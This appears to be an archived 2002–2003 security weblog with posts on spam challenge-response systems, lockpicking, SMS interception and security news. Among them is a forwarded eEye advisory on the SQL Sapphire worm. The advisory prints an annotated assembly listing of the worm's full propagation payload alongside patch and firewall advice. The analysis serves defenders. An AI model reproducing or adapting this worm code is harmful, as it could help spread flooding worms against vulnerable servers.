 Tuesday, 20. May 2003
A Response to a Challenging Response to Challenge-Response
Edward Felten has a pice on anti-SPAM CR systems which I consider less sharp than his usual writing.
First some empirical Data: I have deployed the TMDA CR system last month on a adress used for about 6 years on the web and on Usenet. It reduced SPAM mails from about 150 per day to about one per week. I would not call this "a modest benefit".
But trying to send all that challances to the incredibly broken adresses used by spammers put a considerable load on my mailserver. The outgoing queue now usually contains several hundred messages.
About spammers responding to the challanges: This could be done, but would dramatically change the economics of spamming. The amount of resources needed to send spam would increase by magnitudes and probabyl make it uneconomic to do so.
Also the concern on Alice having to open a loophole for reciving Bob's challange seems overrated to me: Alice has a way to communicate a individual loophole to Bob in the first place, since she is actually sending mail to him. Keep in mind, that this loophole does only be 'secure' enough to make spamming as expensive as ... say US$ 1 per Mail. So we don't have to fear about Eve sniffing th mails and other sophisticated attacks.
An obvious way to fix the loophole problem is Alice whitelisting all adresses she is sending mail to (I do that). An alternative would be that Alice uses a special adress only valid for some time or in conjunction with a certain Message-ID in the References header or the like. People more experienced in security protocol design than me would find dozends of elegant ways to implement 'secure' loopholes.
But: surly CR - like other spam defence mechanism - destroy email as a universal communication medium. And by setting up any kind of spam defense system you must be aware that you make people sending you mails hop through certain loops. Mayby you keep them from using he subject lines they like or prohibit certain words in the message body. Maybe you set rigrid rules on the connfiguration and placement of their mailserver. Maybe you make them answer challanges.
All this makes running mailinglists more and more complicated. This is nothing new: For now a long time AOL forced a contract on you, if you wanted to distribute a mailinglist (meaning more than N messages per hour) to AOL customers.
But in one thin Felten is certainly right: CR and other spam filtering techniques will produce unexpected interactions for a long time.
08:30 |
permanent link |
mail this
Monday, 27. January 2003
SQL Sapphire Worm Analysis
Forwarded from: "Marc Maiffret" <marc@eeye.com>
SQL Sapphire Worm Analysis
Release Date:
1/25/03
Severity:
High
Systems Affected:
Microsoft SQL Server 2000 pre SP 2
Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm
spreading quickly across various networks around the world.
The worm is spreading using a buffer overflow to exploit a flaw in
Microsoft SQL Server 2000. The SQL 2000 server flaw was discovered in
July, 2002 by Next Generation Security Software Ltd. The buffer
overflow exists because of the way SQL improperly handles data sent to
its Microsoft SQL Monitor port. Attackers leveraging this
vulnerability will be executing their code as SYSTEM, since Microsoft
SQL Server 2000 runs with SYSTEM privileges.
The worm works by generating pseudo-random IP addresses to try to
infect with its payload. The worm payload does not contain any
additional malicious content (in the form of backdoors etc.); however,
because of the nature of the worm and the speed at which it attempts
to re-infect systems, it can potentially create a denial-of-service
attack against infected networks.
We have been able to verify that multiple points of connectivity on
the Internet have been bogged down since 9pm Pacific Standard Time.
It should be noted that this worm is not the same as an earlier SQL
worm that used the SA/nopassword SQL vulnerability as its spread
vector. This is a new worm is more devastating as it is taking
advantage of a software-specific flaw rather than a configuration
error. We have already had many reports of smaller networks brought
down due to the flood of data from the Sapphire Worm trying to
re-infect new systems.
Corrective Action
We recommend that people immediately firewall SQL service ports at all
of their gateways. The worm uses only UDP port 1434 (SQL Monitor Port)
to spread itself to a new system; however, it is safe practice to
filter all SQL traffic at all gateways. The following is a list of
SQL server ports: ms-sql-s 1433/tcp #Microsoft-SQL-Server ms-sql-s
1433/udp #Microsoft-SQL-Server ms-sql-m 1434/tcp
#Microsoft-SQL-Monitor ms-sql-m 1434/udp #Microsoft-SQL-Monitor
Once again this worm is taking advantage of a known vulnerability that
has had a patch available for many months. Microsoft has also released
a recent service pack for SQL (Service Pack 3) that includes a fix for
this vulnerability.
Standalone patch:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/MS02-039.asp
SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp
Previous SQL Service Pack versions are vulnerable.
Technical Description
The following is a quick run-down of what the worm's payload is doing after
infection:
1. Retrieves the address of GetProcAddress and Loadlibrary from the
IAT in sqlsort.dll. It snags the necessary library base addresses and
function entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address that will later
be used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random
addresses.
push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h ; Reconstruct session, after the
overflow the payload buffer
; get's corrupted during program
execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h
FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP ; Check entry point fingerprint for
getprocaddress, if it failes
; fall back to GetProcAddress entry
in another DLL version.
; Undetermined what dll versions
this will succedd on. Due
; to the lack of reliable importing
this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C
VALID_GP:
call dword ptr [esi] ; GetProcAddress
call eax ; return from GetProcaddress =
GetTickCount entrypoint
xor ecx, ecx
push ecx
push ecx
push eax
xor ecx, 9B040103h
xor ecx, 1010101h
push ecx ; 9A050002 = port 1434 / AF_INET
lea eax, [ebp-34h] ; (socket)
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
push 11h
push 2
push 2
call eax ; socket
push eax
lea eax, [ebp-3Ch] ; sendto
push eax
mov eax, [ebp-40h] ; ws2_32 base address
push eax
call dword ptr [esi] ; GetProcAddress
mov esi, eax ; save sendto -> esi
or ebx, ebx
xor ebx, 0FFD9613Ch
PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm
Start
In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide
updates as they become available.
This worm has been dubbed the "Sapphire Worm" by eEye due to the fact
that several engineers had to be pulled away from local bars to begin
the investigation/dissection process.
Credit:
Riley Hassell
Related Links:
SQLSecurity.com
http://sqlsecurity.com/
Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/ms02-039.asp
Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please e-mail
alert@eEye.com for permission.
Disclaimer
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of
or in connection with the use or spread of this information. Any use
of this information is at the user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com [isn]
09:03 |
permanent link |
mail this
Len Sassaman:on locks
Len Sassaman: "Locksmiths generally don't discuss the plethora of ways to defeat standard physical security techniques with the general public. Sometimes I think they understand the issue of threat-models better than cryptographers do. They certainly understand that the public doesn't understand." [Hack the Planet]
02:26 |
permanent link |
mail this
CVS flaw could give hackers access to servers
02:18 |
permanent link |
mail this
Saturday, 25. January 2003
Sprint DSL's Gaping Security Hole puts users at risk
Sprint DSL customers are at risk of having their e-mail addresses and passwords stolen -- even when their computers are powered off -- due to weak security controls on their DSL modems. Experts warn... [Securitynewsportal]
10:51 |
permanent link |
mail this
The Art of Budgeting for IT Security Breaches
Siebel Systems CIO Mark Sunday told the E-Commerce Times that although corporate boards are more aware of security issues than ever before, they still do not fully understand them -- and most boards a... [Securitynewsportal]
10:50 |
permanent link |
mail this
Friday, 24. January 2003
On Matt Blaze on Master Locks
Matt Blaze couldn't resist the old hacker tradition of tinkering with locks and was able to produce masterkeys for physical locks by keeping a cryptographers mindset. Nifty.
Edward Felten seems a bit mad at the lock industry knowing of this but not telling us. He points out that "we need independent analysis of security technologies."
Sure that's correct. But we also need something which spreades the analysis. As Seth Finkelstein points out this risk was known for long - but it seems it wasn't known by enough people.
The Chaos Computer Club spun off some years ago the Mission of the Sportenthusiasts of Lockpicking (some english Info on their Site). They taught us that locks are mostly protected by security through obscurity. Even high price/security locks often have systematic faults and can be opened without leaving a trace.
I'm wondering somewhat about the uproar about this thing by the computer security people. I guess it points out again that they don't think enough about physical security. From people doing penetration testing I hear that the physical route is often the easiest. Things like a way to crawl inside the ceiling from the visitors toilet to the server room really happen.
00:34 |
permanent link |
mail this
Thursday, 28. November 2002
First hackers sighted in high speed mobile phone arena
T-Mobile has installed a firewall on its GPRS network in the States after a small number of users complained of receiving hacker probes when using its high-speed mobile service.
The issue came to light after Mike Palmer, the technology director for the broadcast division of AP, spotted numerous probes against his PC while using T-Mobile's GPRS network, Computerworld reports.
[The Register]
08:47 |
permanent link |
mail this
SMS security risks highlighted by Friends Reunited hacking case
Breach of trust by two dismissed mm02 workers, rather than deeper problems, led to the release of private text messages to a jealous boyfriend that sparked a campaign on revenge against his cheating girlfriend.
[...]
Nourse obtained proof of his girlfriends' infidelity by persuading two friends, employees at O2, to intercept her text messages and pass them on to him.
A spokeswoman for O2 told us this was only possible because of a breach of trust by two engineering workers who have subsequently been sacked and convicted for offences under the Data Protection Act. O2 is not prepared to release the names of the pair but tells us both were convicted and fined for DPA offences this July.
The person who intercepted Nourse's girlfriend's messages worked in a "privileged position" at an engineer on 02's text platform. He was aided by another engineer. Cracker tools were not used to extract the text message, O2 told us. The firm said that, despite the incident, it is happy with its systems and users should feel comfortable about the using text messages.
Analysts Gartner said the case illustrates that SMS is not a secure environment suitable for sending confidential messages.
"The contents of SMS messages are known to the network operator's systems and personnel. Therefore, SMS is not an appropriate technology for secure communications. Most users do not realise how easy it may be to intercept," it warns.
Gartner added that the case also showed how important people issues - rather the technologies concerns - are in trying to prevent security breaches. [The Register]
08:46 |
permanent link |
mail this
Sunday, 24. November 2002
Ross Anderson: Security Engeneering
Rob Slade reviews my favourite Security Engineering: "I have often been asked, in regard to these reviews, whether there are, in fact, any books that I like.
Well, I like this one.
If you are involved with security and you haven't read it, you should."
[Security Weblog]
19:46 |
permanent link |
mail this
Saturday, 23. November 2002
Is the new wave of cyber security just to stop web terrorism ... or is there a hidden agenda?
THE trouble with IT is that the more significant it becomes, the more open it is to attack from the same collection of reactionary fools, simian thugs and intellectual pygmies that have worked so hard to screw up the rest of human endeavour for us.
In moves that will no doubt have delighted Iraqi bunker manufacturers, the CIA this month warned that fundamentalist Muslim terror group Hezbollah is among a gaggle of shadowy miscreants hoping to wreak havoc upon the West with a wave of 'cyber-attacks'. Lawks a lawdy -- this is scary stuff.
With breathtaking serendipity, this stark message was bolstered on the same day by an announcement in London by security specialists mi2g that terrorist-backed hacking attacks on the web have increased 10-fold over the past month. The company, which has a board and advisory committee packed with players from the diplomatic, defence and intelligence services, claims that at least 3001 such incursions took place in October.
Connoisseurs of irony, for whom these are rich and fruitful times, will have enjoyed the fact that if the digital revolution is seriously threatened at all, it is largely by the people making such big pronouncements.
Let's cast our minds back to 2001, when the spectre of Code Red threatened to bring the web grinding to a halt. While off-the-record briefings from the FBI's National Infrastructure Protection Centre (NIPC) hinted strongly that the malicious worm was a Chinese cyber-attack responsible for a 30% slowing down in web speeds, it transpired that a non-politically motivated hacker from London was later arrested and the velocity breakdown traced to a train derailment in Baltimore.
By the time the truth was out the damage had been done, but that didn't particularly bother an agency that only days before had been officially censured for its incompetence and was in desperate need of a PR victory. Doubtless the security industry had no regrets over the free publicity either.
There can be no doubt that hacking does pose a very real threat to businesses and governments. Increased use of online services means that malevolent geeks have a multitude of targets to choose from, and clearly these need to be protected.
What's odd, however, is the unbelievably convenient political nature of the threats reported by security agencies. During the trial of Oklahoma bomber Timothy McVeigh it was white supremacists haunting our wires, a danger that was momentarily replaced by the online Cuban menace before switching to the Red Chinese. Since September 11, all the action has apparently been routed from Islam.
In much the same way that fear of terrorist attack has been used to introduce levels of surveillance and executive power in the US that would once have been considered massively unconstitutional, the spooks are now moving to cover the online world. The net is too democratic and makes information and ideas too accessible for such agencies to control, and consequently they're going to do something about it. Sunday Herald Nov 23 2002 3:32PM ET [moreover Computersecurity]
21:41 |
permanent link |
mail this
Research Aims To Stop Battery Attackers
A team of computer scientists is working to prevent new types of denial-of-service attacks aimed at battery-powered mobile devices. Tom Martin, a professor at Virginia Tech's electrical and computer engineering department, has received a grant for more than $400,000 from the National Science Foundation to devise a way to protect battery-operated computers from security attacks that could drain their batteries.
Although the researchers concede that such kinds of attacks are extremely rare, the proliferation of notebook computers, personal digital assistants, tablet PCs, networked cell phones and other devices could make them alluring targets.
The threat could be even more menacing to businesses that use battery backup systems to protect their databases and storage systems against electrical power outages. [LinuxSecurity.com]
09:20 |
permanent link |
mail this
Friday, 22. November 2002
Brief: T-Mobile installs GPRS network firewall
In a move to head off hacker probes detected earlier this month on its GPRS cellular network, T-Mobile USA Inc. has installed a firewall. [Computerworld]
05:23 |
permanent link |
mail this
disLEXia, a research project by Maximillian Dornseif
|
